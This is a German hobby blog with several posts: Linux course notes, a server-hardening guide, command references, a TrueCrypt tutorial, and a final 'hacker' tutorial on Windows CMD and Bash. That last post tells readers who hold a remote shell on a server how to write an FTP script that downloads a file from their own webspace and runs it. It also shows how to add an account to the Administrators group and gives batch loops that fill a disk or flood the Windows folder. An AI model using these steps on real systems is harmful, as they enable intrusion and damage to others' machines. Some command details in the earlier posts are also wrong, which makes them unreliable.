iso9660 = CD-Rom’s
hpfs = OS/2
ntfs = WinXP
vfat = Win9x

Virtuelles Dateisystem = einheitliche Schnittstelle zum Betriebsystem

Prozesse sehen nur die Schnittstelle des Virtuellen Dateisystems. NFS
(Network File System) kann mit mount eingehängt werden. Vorraussetzung:
Zielverzeichnis muss angelegt sein (hier: penne).

1.7 Benutzerverwaltung

Verwaltung der Benutzer in der Datei passwd im Verzeichnis /etc , sie enthält
folgende Einträge:
Username : Passwort : UserIdentifikationsnummer (UID) : Group ID (GID) :
Userinformationen : Homeverzeichnis : Standart Shell
Statt dem Passwort ist meistens ein X eingetragen, das eigentliche Passwort ist in einer
Datei verschlüsselt eingetragen.
Gruppenverwaltung erfolgt in /etc/group:
Gruppenname : Gruppenpasswort : Group ID (GID) : Usernamen01, Username02, …

Einige Kommandos:
whoami „Wer bin ich“
who Liefert Informationen über eingeloggte User (am eigenen Rechner)
finger wie who, liefert auch Informationen vorn anderen Rechnern
users zeigt angemeldete User an
groups zeigt alle Gruppen an
groups <username> Anzeige der Gruppen, die zu <username> gehören.
passwd <user> Passwort für <user> ändern.
passwd –g <groupname> Gruppenpasswort für die Gruppe <groupname> ändern.
id <username> Anzeige der User ID.
id –g <username> Anzeige der GID von der Hauptgruppe
id –G <username> Anzeige aller GID’s
id –nG <username> Anzeige aller Gruppen
su <username> Identität wechseln (Beispiel User –> root)
sg <gruppenname> Gruppenidentität wechseln

Anlegen von Username durch den Administrator root:
useradd [Optionen] <username>
Optionen:
-e Kommentar
-d Homeverzeichnis
-e Verfallsdatum
-g Hauptgruppe
-G Gruppenliste (Gruppenname durch Kommata getrennt)
-m Homeverzeichnis anlegen
-u User ID
-s Standart Shell (Betriebsinterpreter)

Beispiel:
1. Anlegen des Users franz in bkik103
Useradd –m –g raid franz

2. User anlegen mit mehreren Optionen
useradd –u 4711 –g schueler /home/schueler/haeberle –s /bin/ksh –e
’Oberhofstr.27,Nussdorf’ haeberle

3. User entfernen
userdel –r <username>

Gruppe hinzufügen
groupadd [Optionen] gruppenname
Gruppe löschen
groupdel [Optionen] <gruppenname>
Ändern des Benutzeraccounts
usermod [Optionen] <username>
Bsp. User „max“ (UID 302) soll in „moritz“ geändert werden.
UID ermitteln:
id max
usermod –u 302 –l moritz –d /home/moritz –m
-u Userid
-l neuer Account
-d neues Homeverzeichnis
-m Heimatverzeichnis angelegt, Inhalte werden in das neue
Heimatverzeichnis verschoben.
Homeverzeichnis entfernen

Was tun, wenn root Passwort vergessen?
- Linux Rettungssystem von CD booten
- Wurzelpartition in ein Verzeichnis mounten
- chroot /<Verzeichnis> passwd
- mit exit System verlassen

1.8 Dämonen und Prozessverwaltung

Dämonen (‚daemons’) sind unter Linux „dienstbare Geister“, die im Hintergrund
verschiedene Aufgaben erledigen.

Bsp.:
Druckerdämon = Lpd
Metadaemon = inetd
httpd = Daemon für den Webserver
läuft immer, und startet gegebenenfalls
andere Dienstprogramme.

Syslogd-Dämon = wird zur Protokollierung der verschiedenen
Prozesse eingesetzt

bash:
Benutzerschnittstelle (Kommandointerpreter)
der im Hintergrund läuft.

Anzeige der laufenden Prozesse
ps
ps –u
zeigt: Prozess-ID PID, Zustand (STAT)
USER
Mögliche Prozess-Zustände (STAT)
D Nicht unterbrechbarer Schlaf
R laufend (run)
S schlafen (sleep)
T unterbrochener Prozess
Z Zombie – Prozesse

Anzeige der Daemon – Prozesse
ps –ux

Bsp.:
* Diskette „im Hintergrund“ kopieren
cp * /flobby &

& = Im Hintergrund

* Prozesse werde mit <STRG> + <Z> schlafen gelegt.

Prozesse in den Hintergrund schieben (Background)
Bsp.:
bg 117
* umgekehrt in den Vordergrund (Foreground)
fg 117
* Prozesse bzw. Befehle Prioritäten zuteilen
nice 3 <befehl>

3 = Prioritätennummer
Niedrigste Priorität: +19
Höchste Priorität: -20
Negative Prioritätsnummern kann nur der root vergeben.

* Prozess beenden

kill 117

117 = PID

1.9 Linux Bootprozesse

1. BIOS
Selbsttest der Hardware
2. Bootloader
Normalerweise im Master Boot Record (MBR)
(damals bis Linux 7.x LILO heute GRUB)
Bootbare Partition muss mit einem „bootable“ Flag versehen sein.
3. Initialisierung des Kernels
Suchen des init-Programms im Verzeichnis
/sbin bzw. in /etc oder in /bin
4. Laden von init
init-Prozess starten.
Konfiguration aus der Datei /etc/inittab entnehmen. (z.B. runlevel 2)
so genannte runlevel feststellen
(Einstellen des Runlevels durch Benutzer beim Booten)
5. Abarbeiten des Runlevel-Skripts

Runlevels

0 Systemhalt
S Singel User Modus nur US-Tastatur
1 Einzelnutzerbetrieb (Singel User)
2 Lokaler Mehrnutzerbetrieb ohne Netzwerk (NFS)
3 Voller Multibenutzerbetrieb im Netzwerk
4 frei, nicht benutzt
5 Voller Multibenutzerbetrieb mit grafischer Oberfläche (KDE, GNOME, …)
6 Systemneustart

Runlevelskript sind im Verzeichnis /etc/init.d untergebracht.
Für jeden Runlevel gibt es ein eigenes Verzeichnis.

Bsp.:
Jedes Skript ist zweimal als Link im entsprechenden Runlevel-Verzeichnis vorhanden.
/etc/rc.d/rc2.d
Verzeichnis für das
Runlevel 2 Skript

Als Administrator (root) kann man in ein Runlevel wechseln, mit dem Kommando:
init <levelnummer>
* Runlevel-Nummer beim Bootloader (LILO, GRUB) bei den Bootoptionen eintragen.
* Im grafischen „Runlevel-Editior“ kann man eintragen, welche Prozesse (installierte
Programmskripte) in welchen Runlevel gestartet werden sollen (Beispielsweise:
samba-Fileserver)

Konfigurationsdateien unter Linux (Auswahl), zu finden im Ordner /etc
fstab: Enthält Angaben über Dateisysteme, die beim Systemstart gemountet werden.
profil: Einträge zum Suchpfad, Umgebungsvariablen Alias (Änderungen durch root).

Benutzerspezifische Einträge (im Homeverzeichnis)
.forward E-Mailweiterleitungen
.profil Bsp.: Suchpfad ergänzen
Umgebungsvariablen, Alias

Linux Standartsuchpfad:
PATH = /sbin:/bin:/usr/bin
Ergänzen von PATH PATH=$PATH:/meinVerzeichnis

1.10 Linux im Netzwerk
o Rechnername max. 8 Zeichen
o Domainname: Logischer Teil im Netzwerk
o Gateway-Adresse: Verbindung zu entfernten Netzen (Intranet)

Auswahl von Netzkommandos
ping pasta
ping 10.2.106.1
Testnachricht wird gesucht, Antwort wird vom Server erwartet.
traceroute seon.de

Antwort: IP-Adresse bzw. der Name der Router, die auf der Route liegen.
WINDOWS: tracert
Telnet:
Terminalsitzung auf entfernten Servern (Telnet Daemon muss aktiv sein)
(Wegen Sicherheitsproblem nicht mehr Standart)

SSH:
Verschlüsselte Zugriff auf entfernte Server (Standart unter Linux)
Kommando: ssh <servername>
ssh benutzername@servername
(Windows: Putti-Tool)
ssh = secure shell

FTP (File Transfer Protocol):
Kommando: ftp <servername>
–> ftp-Shell
ftp> …

ftp-Shell-Kommandos:
ls Dateien auflisten
get <Dateiname> Datei holen
put <Dateiname> Datei uploaden
cd zum Wechseln der Verzeichnisses

Domain Name Server – DNS:
- Zuordnung von Domain-Namen zu IP-Adressen (auch Rechnernamen)
Network File System – NFS:
- Zugriff auf Netzwerkverzeichnisse von anderen NFS-Server (mounten)
Network Information System – NIS:
(Ursprünglicher Name YellowPages „Gelbe Seiten“)
- Übertragung von Benutzerdaten (Username, Passwort)
- Beispiel Elektronikschule:
NIS-Server: penne
NIS-Client: spaetzle, pasta
Auf der Linux-Workstation kann man sich auf dem NIS-Server penne einloggen.
(Falls NIS-Client aktiviert wurde)

2.11 Das grep-Kommando
„Global search for a Regular Expression and print out matched lines”
Globale Suche in mehreren Dateien oder in einer Datei nach einem Textmuster,
Anzeige der passenden Zeilen.
Kommando:
grep [–parameter] textmuster Dateiname [>Zieldatei]

Einige Parameter:
-c Anzahl der Zeilen, in denen, das Muster enthalten ist
grep –c raid /etc/passwd
-i Keine Unterscheidung zwischen Groß- und Kleinschreibung
-l Anzeige der Dateinamen wo Muster vorhanden sind

Beispiel zu grep –l
grep –l tcp /etc/host*

Bsp.: Ergebnis:
/etc/host.allow
/etc/hostc.deny

Posted in Linux Stuff | No Comments »

Linux Server absichern

1. root-User deaktivieren:
zuerst den Befehl

adduser

eingeben. Dann einen neuen Benuzernamen eingeben (Er sollte mehr als 6 Buchstaben haben)

danach in der Datei “sshd_config” im Verzeichnis “/etc/ssh/”
die Zeile:

PermitRootLogin yes

suchen und mit no ersetzen. (PermitRootLogin no)
Beim nächsten Login mit dem neuen User einloggen und mit dem Befehl:

su

root-Rechte bekommen. Fertig!

2. SSH-Port ändern:
Die Datei “sshd_config” im Verzeichnis “/etc/ssh/” öffnen und in der Zeile wo

port 22

steht einfach z.B. port 222 reinschreiben, danach in das Verzeichnis /etc/init.d/ wechseln und den SSHd-Dienst mit ./sshd restart neu starten. Dann macht ein Zweites Putty-Fenster auf und probiert die Konfiguration aus. (Nicht vergessen den Verbindungsport dann im Putty auch dem entsprechend zu ändern )

3. Port Sperren:
einfach (um z.B. port 80 zu sperren)

iptables –A INPUT –dport 80 –j DROP

eingeben.

4. Eine IP-Adresse sperren:
Wir wollen z.B. die IP-Adresse 74.125.50.90 sperren:

iptables –A INPUT –s 74.125.50.90 –j DROP
eingeben.

Eine Range kann mit folgendem Befehl gesperrt werden (Beispiel: 74.124.0.0 bis 74.124.255.255):

iptables –A INPUT –s 74.125.0.0/24 –j DROP

5. Gegen DDoS (Distributed Denial of Service) schützen:
Eine gute Anleitung gibt es unter huschi.net

Posted in Linux Stuff | No Comments »

Linux Befehle

Hier mal ein paar Linux-Befehle:

chown -R mygov /home/blablub = Gibt für den User mygov die Berechtigung um files auszuführen.

find . -name *locali* = Sucht nach *locali* und spuckt die Ergebnisse aus.

pwd = Zeigt das aktuelle Verzeichnis an indem man sich gerade befindet.

mkdir -p /tmp/dir1/dir2 = Erstellt den Verzeichnisbaum /tmp/dir1/dir2

rm -f file1 = Löscht die Datei “file1″

chown user1 file1 = Ändert den Besitzer der “file1″ zu “user1″

chown -R user1 directory1 = Ändert den Besitzer des Ordners “directory1″ und alle Unterordner inkl. Dateien in “user1″

tar -xvfj archive.tar.bz2 = Entpackt bz2 Archive

tar -xvfz archive.tar.gz = Entpackt gz Archive

unzip file1.zip = Entpackt zip Files

Update:

Verzeichnis Operationen

cd
Wechselt in das angegebene Verzeichnis

ls
Zeigt den Inhalt des aktuellen oder des angegebenen Verzeichnisses an

mkdir
Legt ein neues Verzeichnis an

pwd
Zeigt das aktuelle Verzeichnis an

rmdir
Loescht ein Verzeichnis

Editoren

emacs
Maechtiger Editor mit Mail und News-Funktionen.

joe
Editor mit WordStar-aehnlichem Userinterface

pico
Einfacher Editor, der auf dem Pine-Composer basiert.

vi
Standard Unix-Editor.

vim
vi-Improved. vi mit erweiterter Funktionalitaet

Datei Operationen

basename
Gibt einen Dateinamen ohne Pfadangaben aus

cat
Verbindet mehrere Dateien und gibt das Ergebnis auf Standardausgabe aus

chgrp
Gruppenzugehoerigkeit einer Datei aendern

chmod
Zugriffsrechte aendern (rwx)

chown
Eigentuemer einer Datei aendern

cmp
Vergleicht zwei Dateien auf Uebereinstimmung

cp
Kopiert Dateien und Verzeichnisse

cpio
Kopiert Dateien in bzw. aus Archiven

dirname
Gibt nur den Pfad zu einer Datei aus

file
Zeigt den Dateitypen einer Datei an.

head
Gibt die ersten Zeilen einer Datei aus

less
Eine bestimmte Anzahl Zeilen einer Datei anzeigen

ln
Erstellt einen Link zu einer Datei/Verzeichnis

mkdirhier
Erstellt eine Verzeichnishierarchie

more
Durch einen Text scrollen (nur nach unten).

mv
Verschiebt Dateien und Verzeichnisse (bennennt auch um)

rm
Loescht Dateien und Verzeichnisse

split
Datei aufteilen (zB zum Transport per Mail oder Diskette)

tail
Gibt die letzten Zeilen einer Datei aus

touch
Aendert den Zeitstempel von Dateien.
Wenn eine Datei nicht existiert, wird sie mit einer
Groesse von 0 Byte angelegt

Hilfe anzeigen

apropos
Zeigt die Titel von man-pages zu einem gegebenen Stichwort an

info
Zeigt GNU Info Seiten an. info ist eine Alternative
zu man, die vor allem von GNU Software genutzt wird.

man
Zeigt man-pages an. man-pages sind Seiten aus dem
Linux Programmer’s Manual.

whatis
Zeigt die Titel von man-pages zu einem gegebenen Stichwort an

ISDN Management

imon
Zeigt Informationen ueber die aktuellen ISDN-Verbindungen an

isdnctrl
Setzt ISDN Informationen bzw gibt diese zurueck.
Startet und beendet auch eine ISDN Verbindung.

Kommunikation

wall
Schickt den Inhalt einer Datei an alle angemeldeten User.

mail
Sendet eine E-Mail an einen User.

mailq
Zeigt noch zu versendende Mails an

mesg
Stellt ein, ob Nachrichten anderer User auf dem
eigenen Screen angezeigt werden sollen.

talk
‘kopiert’ Zeilen vom Screen eines Users auf den Screen
eines anderen Users. Das heisst mit talk koennen sich zwei User ‘unterhalten’

write
Schreibt eine Nachricht auf die Console eines anderen Users,
sofern dieser diese Option nicht mit mesg abgeschaltet hat.

Komprimierung

tar
Archiv- und Bibliotheksverwaltung

compress
Komprimiert Dateien im Lempel-Ziv Verfahren

gzip
Komprimiert und dekomprimiert Dateien im Lempel-Ziv Verfahren

tar
Komprimiert und dekomprimiert Archive mehrerer Dateien

unzip
Dekomprimiert zip-Archive.

zip
Komprimiert Dateien. zip-Archive werden auch von PKZIP und WinZip (DOS/Win)

Verschiedenes

alias
“Legt alias-Namen fuer Kommandos an.
Zum Beispiel ‘alias rmd=”"rm -rf “”‘”

at
Einmaliges ausfuehren eines Befehles zu einer bestimmten Zeit

batch
Einmaliges ausfuehren eines Befehles wenn das System nicht ausgelastet ist

cal
Zeigt einen Kalender an

clear
Loescht die Konsole

comm
Selektiert gleiche Zeilen der Ausgabe/Datei

crontab
Zeigt die userspezifische Cron-Tabelle an, bzw. oeffnet sie zum editieren

date
Gibt das aktuelle Datum aus.

echo
Gibt einen Text auf der Konsole aus.

env
Gibt alle Umgebungsvariablen aus.

expr
Auswerten von Ausdruecken.

find
Durchsucht den Verzeichnisbaum, ausgehend vom aktuellen Verzeichnis,
nach einer Datei.

fold
Bricht ueberlange Zeilen um

grep
Sucht nach einer Zeichenfolge in einer Datei, oder einer
umgeleiteten Ausgabe (echo test.txt | grep blafasel)

halt
Runterfahren des Systems.

history
Gibt die Eintraege im History-File des Users nummeriert aus

hostname
Zeigt den Namen des Rechners an

init
Runlevel wechseln

join
Verknuepft Zeilen der Ausgabe

nl
Nummeriert die Zeilen der Ausgabe

pr
Konvertiert Texte zum Drucken.

printenv
Gibt alle Umgebungsvariablen aus.

reboot
Neu starten des Systems.

rev
Zeichenfolge umkehren

shutdown
Runterfahren, bzw. Reboot des Systems

sleep
Eine Anzahl von Sekunden warten

sort
Sortiert die Ausgabe von Programmen, bzw Dateien

strings
Extrahiert alle (lesbaren) Zeichenfolgen aus einer Datei/Eingabe

sum
Ermittelt Dateilaenge und Pruefsumme einer Datei

tee
Verdoppelt die Ausgabe eines Programmes
(zum gleichzeitigen Anzeigen auf Bildschirm und mitloggen in Datei)

type
Zeigt den Typen einer Datei und die Interpretation des Dateinamens als Parameter an

uniq
Entfernt doppelte Zeilen in einer Datei

wc
Zaehlt Buchstaben, Zeilen und Woerter der Eingabe.

Netzwerk Management

ftp
Öffnet eine FTP-Session zum angegebenen Rechner. Per FTP
(File Transfer Protocol) koennen verschiedene Datei- und
Verzeichnisoperationen auf dem entfernten Rechner durchgefuehrt werden.

ifconfig
Konfiguriert Netwerk-Schnittstellen, bzw gibt deren
Konfiguration und Status aus

ipchains
Tool zur Konfiguration der Kernel-Firewall

netdate
Zeitsynchronisation mit entferntem Rechner

netstat
Gibt Informationen ueber Netzwerkverbindungen, Routingtabellen ua aus

ping
Sendet kleine Datenpakete an die angegebene IP-Adresse bzw. den
angegebenen DNS-Namen und wartet auf eine Antwort der Gegenstelle.
Zum ueberpruefen einer Netzverbindung

rcp
Remote Copy. Kopiert auf entfernten Rechner.

route
Manipuliert die Routen zu entfernten Rechnern.
Normalerweise zum Erstellen einer statischen Route zu einem speziellen Rechner.

telnet
Öffnet eine Telnet-Session zum angegebenen Rechner. Per Telnet
kann ein anderer Rechner “ferngesteuert” werden.

tty
Zeigt das device an, ueber das man angemeldet ist

Partitions Management

badblocks
Durchsucht einen Partition nach beschaedigten Bloecken (BadBlocks)

dd
Kopiert Partitionen/Dateisysteme bytegenau

dumpe2fs
Gibt Informationen ueber das Dateisystem auf einer Partition aus

e2fsck
Prueft und repariert Linux ext2 Dateisysteme

e2label
Weist einem Dateisysten ein Label (Bezeichnung) zu,
bzw gibt das Label aus

fdisk
Legt Partitionen an und loescht sie. Anzeige der aktuellen Partitionstabelle

fsck
Prueft und repariert Linux Dateisysteme

hdparm
Programm zum Einstellen verschiedener Parameter einer Festplatte

mkdosfs
Erzeugt ein Dos (FAT16 und FAT32) Dateisystem auf
der angegebenen Partition

mke2fs
Erzeugt ein ext2 Dateisystem auf der angegebenen Partition

mkfs
Frontend zu verschiedenen Filesystem-Erstellern

mkswap
Erzeugt eine Linux Swap-Partition auf der angegebenen Partition

mount
Haengt ein Dateisystem (eine Partition, Diskette..) in
den Verzeichnisbaum ein (an einen Mountpoint)

tune2fs
Programm zum Einstellen verschiedener Parameter
des ext2 Dateisystems (zB maximal mount count)

umount
Loest ein Dateisystem aus dem Verzeichnisbaum

Prozess Management

kill
Beendet den Prozess mit der uebergebenen Prozess-ID (PID)

killall
Beendet alle Prozesse mit dem uebergebenen Namen

killproc
Beendet den Prozess, dessen ausfuehrbare Datei im
uebergebenen Pfad zu finden ist

nice
Setzt die Prioritaet eines Prozesses

nohup
Startet ein Programm immun gegen SIGHUPs

pidof
Gibt die PID(s) des Prozesses mit dem uebergebenen Namen aus

ps
Zeigt alle Prozesse mit ihrer PID, der User-ID des
ausfuehrenden Users, die Terminal-ID etc. an

pstree
Zeigt alle Prozesse in einer Baumdarstellung an

top
Zeigt Prozesse in einer sich staendig aktualisierenden
Liste an. Die Prozesse, die die meiste CPU-Zeit brauchen,
werden zu oberst angezeigt.

Drucken

lpq
Druckauftraege anzeigen

lpr
Druckauftrag in Druckerschlange stellen

lprm
Druckauftrag loeschen

lptest
Testmuster zum Druckertest ausgeben (lptest | lpr)

Suchen

find
Umfangreiches Suchtool

locate
Sucht Dateien mittels eines Indexes, der durch updatedb erstellt wird

updatedb
Erstellt einen Suchindex ueber das gesammte
Dateisystem fuer locate

whereis
Sucht das Binary (ausfuehrbare Datei), den Quellcode
und die man-Page eines Programmes

which
Gibt den ersten gefunden Pfad eines Programmes im Pfad (echo $PATH) an

System Infos

df
Zeigt die Speicherauslastung der Partitionen des Systems an,

du
Zeigt den Speicherverbrauch einzelner Verzeichnisse an

free
Zeigt die Speicherauslastung des Systems an. Geteilt in RAM und SWAP-Space.

uptime
Zeigt die Uptime der Maschine an. Die Uptime ist die Zeit seit dem letzten Reboot.

User Infos

finger
Gibt den Login-Namen, Real-Namen, Terminal Namen, Schreibstatus,
die Idle-Zeit (Zeit seit der letzten Nutzung des Accounts),
die Login-Zeit, den Standort und die Buero-Telefon-Nummer
des angegebene Useraccounts aus.

groups
Gibt die Gruppenzugehoerigkeit eines Users aus

id
Gibt den eigenen Login-Namen inklusive Gruppe aus

last
Zeigt die letzten Logins an.

logname
Gibt den eigenen Login-Namen aus

w
Um Informationen ueber die momentan ausgefuehrte
Taetigkeit erweitertes who

who
Gibt die Login-Namen der momentan eingelogten User
zusammen mit den Terminal-IDs und dem Login-Zeitpunkt aus

whoami
Gibt den eigenen Login-Namen aus

User-Account Management

chfn
Aendern der User-Informationen eines AccountsRoom-NumberWork-PhoneHome-Phone

chsh
Aendern der Login-Shell eines Useraccounts

exit
Aktuelle Session verlassen

groupadd
Anlegen einer neuen User-Gruppe

groupdel
Loeschen einer bestehenden User-Gruppe

groupmod
Aendern der Daten einer bestehenden User-Gruppe

login
Als Benutzer anmelden bzw. neu anmelden.

newgrp
Aendern der aktuellen Gruppe

passwd
Festlegen bzw. Aendern des Passwortes eines Useraccounts

su
Neue Session mit anderem Account aufmachen (su – : root-Account).

sudo
Befehl als root ausfuehren.

useradd
Anlegen eines neuen Useraccounts. Zumindest der
Login-Name muss angegeben werden

userdel
Loeschen eines Useraccounts.

usermod
Aendern eines bestehenden Useraccounts.

Posted in Linux Stuff | No Comments »

Festplatte verschlüsseln mit TrueCrypt

Vorraussetzungen:
Eine Partition, die ihr verschlüsseln wollt, so wie ein Passwort, das nur ihr wisst und ihr “nicht mehr” vergessen solltet, denn ansonsten kommt ihr nicht mehr an die Daten ran!

Download von TrueCrypt

Weitere Informationen über TrueCrypt

Lektion 1 – Partition verschlüsseln

1. TrueCrypt starten und “Create Volume” auswählen.
2. Ob sichtbar oder unsichtbar (hidden) könnt ihr selbst entscheiden. Klickt dann auf Next.
3. Jetzt sucht ihr die zu verschlüsselnde Partition, bestätigt mit Ok, und lasst den Haken bei “Never Search History” drin. Next!

Entcryption Algorithm: Wählt AES aus.
Hash Algorithm: SAH-1

Klickt weiter bis ihr zum letzten Feld gelangt:
Nun müsst ihr das Passwort eintippen.
Ihr dürft es nicht mehr vergessen…!

Filesystem: NTFS
Cluster: Default

! ! ! Bitte beachtet, dass eure Partition formatiert wird ! ! !

Jetzt klickt ihr auf “Format” – das kann eine weile dauern.

Lektion 2 – Partition mounten
(muss vor der Benutzung gemacht werden)

1. True Crypt starten und auf “Select Device” klicken, dort wählt ihr die zu entschlüsselnde Partition aus.
2. Wählt im Fenster einen Laufwerksbuchstaben aus! -> Doppelklick.
3. Passwort eintippen! (Nicht die Option “Cache Password and Keyfiles in Memory” auswählen!) -> Ok!
4. Jetzt ist die Partition im Arbeitsplatz sichtbar und ihr könnt darauf zugreifen.

Posted in Downloads, Tipps&Tricks, Win Stuff | No Comments »

Konsolenbefehle (CMD und Bash)

Wir haben jetzt schon einige Wege kennengelernt, eine Remote-Shell (Konsole) auf einem System zu bekommen. Doch was nützt uns das, wenn wir keine tollen Befehle kenn, mit denen wir die Konsole füttern können? Nichts
Unter Windows ist die Konsole die Eingabeaufforderung oder auch CMD (von command.com) genannt. Unter Linux gibt es verschiedene Konsolen, doch die am meisten genutzte ist wohl die Bash (Burn Again Shell). Auch wenn euch die Shells zu Anfang recht kompliziert vorkommen, wenn man sich mit ihnen angefreundet hat merkt man, dass sie einem relativ viel Arbeit ersparen und vor allen sehr Mächtig sind. Ausserdem sind sie für das Benutzen von Exploit unerlässlich Also fangen wir mal an…

CMD

Wie bereits geschrieben auch Eingabeaufforderung genannt. Unter Windows erreicht ihr sie indem ihr auf Start -> Ausführen -> cmd geht. Die Klammern < > die ich verwende, gehören nicht zum Befehlssyntax, sondern sollen euch nur sagen, dass ihr hier eigene Parameter angeben müsst. Also dann gehen wir mal an die Basics =D Wenn ihr mehr zu einem Befehl wissen wollt gibt als Parameter einfach /? ein und ihr bekommt eine ausführliche Hilfe. Groß- und Kleinschreibung ist bei Windows egal.

<Datei> – öffnet eine Datei
cd <Verzeichnis> – Wechseln in ein Verzeichnis (Change Directory)
cd – Wechselt in das Wurzelverzeichnis (Root-Directory)
cd.. – Wechselt ein Verzeichnis nach oben im Verzeichnisbaum
dir – Listet den Inhalt des Ordners auf in dem ihr euch gerade befindet
dir *.exe – Listet alle Dateien mit der Endung .exe auf (im aktuellen Verzeichnis)
<Festplattenbuchstabe>: – Wechselt auf eine andere Festplatte
del <Datei> – Löscht eine Datei
del *.* – Löscht alle Dateien im aktuellen Verzeichnis
move <Quelle> <Ziel> – Verschieben von Quelle nach Ziel
copy <Quelle> <Ziel> – Kopiert Datei von Quelle nach Ziel
format <Festplattenbuchstabe> – *hrrrr* ^^
mkdir <Name> – Erstellt ein Verzeichnis
rename <Datei1> <Datei2> – Datei1 in Datei2 umbenennen
net user – Gibt uns eine Liste alle Benutzer
net user <Name> – Gibt Informationen über einen bestimmten Benutzer aus
net localgroup – Listet alle lokalen Benutzergruppen auf
net localgroup <Name> – Informationen und Mitglieder einer bestimmten Gruppe
net services – Gibt uns eine Liste alle Dienste sowie deren Status an
net start <Dienst> – Startet einen Dienst
net stop <Dienst> – Stoppt einen Dienst
net send <Hostname/IP> <Nachricht> – Sendet eine Nachricht an einen PC
net user <Name> * /ADD – Fügt einen neuen Benutzer hinzu (Gruppe: Benutzer)
net localgroup <Gruppe> <Name> /ADD – Fügt einen Benutzer einer Gruppe hinzu – Wie wäre es mit Administratoren =D
echo <Irgendwas> – Der Text nach echo wir ausgegeben
echo %<Umgebungsvariable>% – Gibt den Inhalt einer Umgebungsvariable aus
ftp – Startet den FTP-Client
telnet – Startet den Telnet-Client
telnet <Ip/Host> <Port> – Zu einem Rechner auf einem bestimmten Port verbinden
ping <Hostname/IP> – Ping eine IP
set – Zeigt alle Umgebungsvariablen an
title <String> – Verpasst unserer Konsole einen neuen Titel
color <inderhilfegucken> – Farbe gefällig
type <Datei> – Zeigt den Inhalt einer Datei
find “<String>” /i <Datei> – Durchsucht eine Datei nach einem String und ignoriert Groß- und Kleinschriebung
ver – Zeigt uns die aktuelle Windows-Version an
rem <irgendwas> – Macht NIX Mit rem kommentiert man in Batch seinen Code
cls – Löscht den Inhalt der Konsole

Umleitungsoperatoren

dir /s | find “.bmp” /i
dir /s listet den kompletten Verzeichnisbaum inc. Unterverzeichnisse und Dateien auf (also den gesammten Festplatteninhalt). Das Pipe-Symbol | leitet diese Ausgabe jetzt nicht auf den Bildschrim sondern zum Befehl find “.bmp” /i weiter, wo nach dem String .bmp gesucht wird. So bekommen wir alle .bmps die sich auf der Festplatte angezeigt.

echo w00t > new.txt
echo w00t würde eigentlich den Text w00t auf dem Bildschirm ausgeben, doch dieser wir durch den Umleitungsoperator > (ein Krokodil, das den Text auffrisst ) in die Datei new.txt geschrieben. Existiert die Datei nicht, so wird diese erstellt. Existiert die Datei bereits, so wird sie überschrieben.

echo r00t >> new.txt
Der Effekt ist der Gleiche wie bei nur einem Umleitungsoperator, doch wir die Datei nicht überschrieben, falls sie bereits vorhanden ist, sondern wird unsere Ausgabe unten angefügt.

Es gibt noch dem < Umleitungsoperator, aber den hab ich noch nie gebraucht =D

FTP-Script

Jetzt stellt euch aber mal vor ihr habt eine Remote-Shell auf einem Server und wollt eine Datei hochladen. Was machen wir dann? Zuerst holen wir uns etwas Webspace (zB. www.tripod.de) wo wir unsere Datei(en) hochladen, dann schreiben wir uns ein kleines Script und füttern damit den FTP-Client :]

echo open ftp.tripod.de > scr
echo user <Benutername> >> scr
echo <Passwort> >> scr
echo type binary >> scr
echo get <Datei> >> scr
echo quit >> scr
ftp –s:scr –v –n

Jetzt nur noch die Datei ausführen und schon sind wir am Ziel…

Konsolen-Styling

Wenn wir jetzt schon zu Tastatur-Cowboys geworden sind, dann brauchen wir auch eine kewle Shell mit der wir und durch die ganze Welt hacken =D Und mit unserem jetzigen Wissen ist das ganze auch kein Problem mehr =P
Macht einen Rechtsklick auf euren Desktop und geht auf Neu -> Verknüpfung. Jetzt geben wir als Datei folgenden ellenlangen String an:

cmd /k title :: moo’s haXX0r Konsole & color 0a & cd & cls & echo +++++++++++++++++++++++++ & echo + Welcome to HaXX-Shell + & echo +++++++++++++++++++++++++  & ver

Fertig.
cmd /k startet die Konsole und lässt die offen. Der Befehl title legt den Titel des Fensters fest, color 0a sorgt für die Matrix-Farbe, cls löscht den Konsolen-Inhalt, echo gibt eine kewle Begrüßung aus und ver zeigt uns unsere Windows-Version an. Die einzelnen Befehle sind durch & verkettet.

Schrieben wir uns mal ein kleines Batch-Script, dass die Festplatte mit Datenmüll floodet =P Notepad öffnen und folgenden Code abschreiben (kein Copy & Paste). Dann als .bat oder .cmd speichern (nicht als .txt).

@echo off
echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > big
:loop
type big >> big
goto loop

@echo off sorgt dafür, dass die Befehle nicht immer auf dem Bildschirm ausgegeben werden. Dann erstellen wir uns eine Datei mit lauter XXXXX drinne. Setzt setzen wir eine Sprungmarke und lassen und mit type die XXXXX-Datei ausgeben. Aber nicht auf den Bildschirm, sondern fügen den Inhalt noch mal an die Datei big dran. Dann springen wir wieder zur Sprungmarke und das Spiel geht von vorne los =D Die big-Datei wächst also exponentiell (1-2-4-8-16-32-64-128-256-512-1024-usw.) und nach kurzer Zeit ist die Festplatte mit einer Datei voll.

Ein Ordner-Flooder ist auch ganz lustig (:

@echo off
cd C:WINNT
:loop
mkdir %random%%random%%random%
goto loop

Wir wechseln erst in das Windows-Verzeichnis und erstellen dann Ordner mit einer (in unserem Fall drei) Zufallszahl (probiert mal echo %random%) also Ordnernamen. Dann wird geloopt. Schon sind in Sekunden tausende von Ordnern erstellt :>

Ihr seht, mit der Konsole kann man ziemlich viel machen. Ihr habt nur einen Bruchteil der vorhandenen Befehle kennengelernt (alleine der net-Befehl ist riesig und mächtig =D) und viele warten noch darauf von euch benutzt zu werden . Ein kleine Listet erhaltet ihr, wenn ihr in der Konsole einfach mal help eingebt.
Wenn man einigermaßen mit der Konsole umgehen kann, ist es auch keine Arbeit Batch zu lernen, was wirklich einfach ist und trotzdem sehr hilfreich sein kann.

Bash

Meisten bekommen wir beim r00ten von Rechnern ja eine Remote-Shell, auf der wir unser Unwesen treiben können. Und damit wir unsere 1337-Karriere voranzutreiben müssen wir lernen Exploits zu benutzen. Doch die sind fast alle für Linux geschrieben… Wir ihr seht kommt der Ueberhacker von Heute kaum um Linux rum. Also lasst uns mal einen kleinen Blick auf die wichtigsten Befehle werfe =D

pwd – Gibt das aktuelle Arbeitsverzeichnis aus
cd <Verzeichnis> – Wechselt in ein Verzeichnis
cd .. – Geht ein Verzeichnis nach oben im Verzeichnisbaum
ls – Gibt uns den Ordnerinhalt aus
cd – Wechselt ins Home-Verzeichnis
ls –a – Gibt uns den Ordnerinhalt mit erweiterten Informationen aus
mkdir <Name> – Erstellt einen Ordner
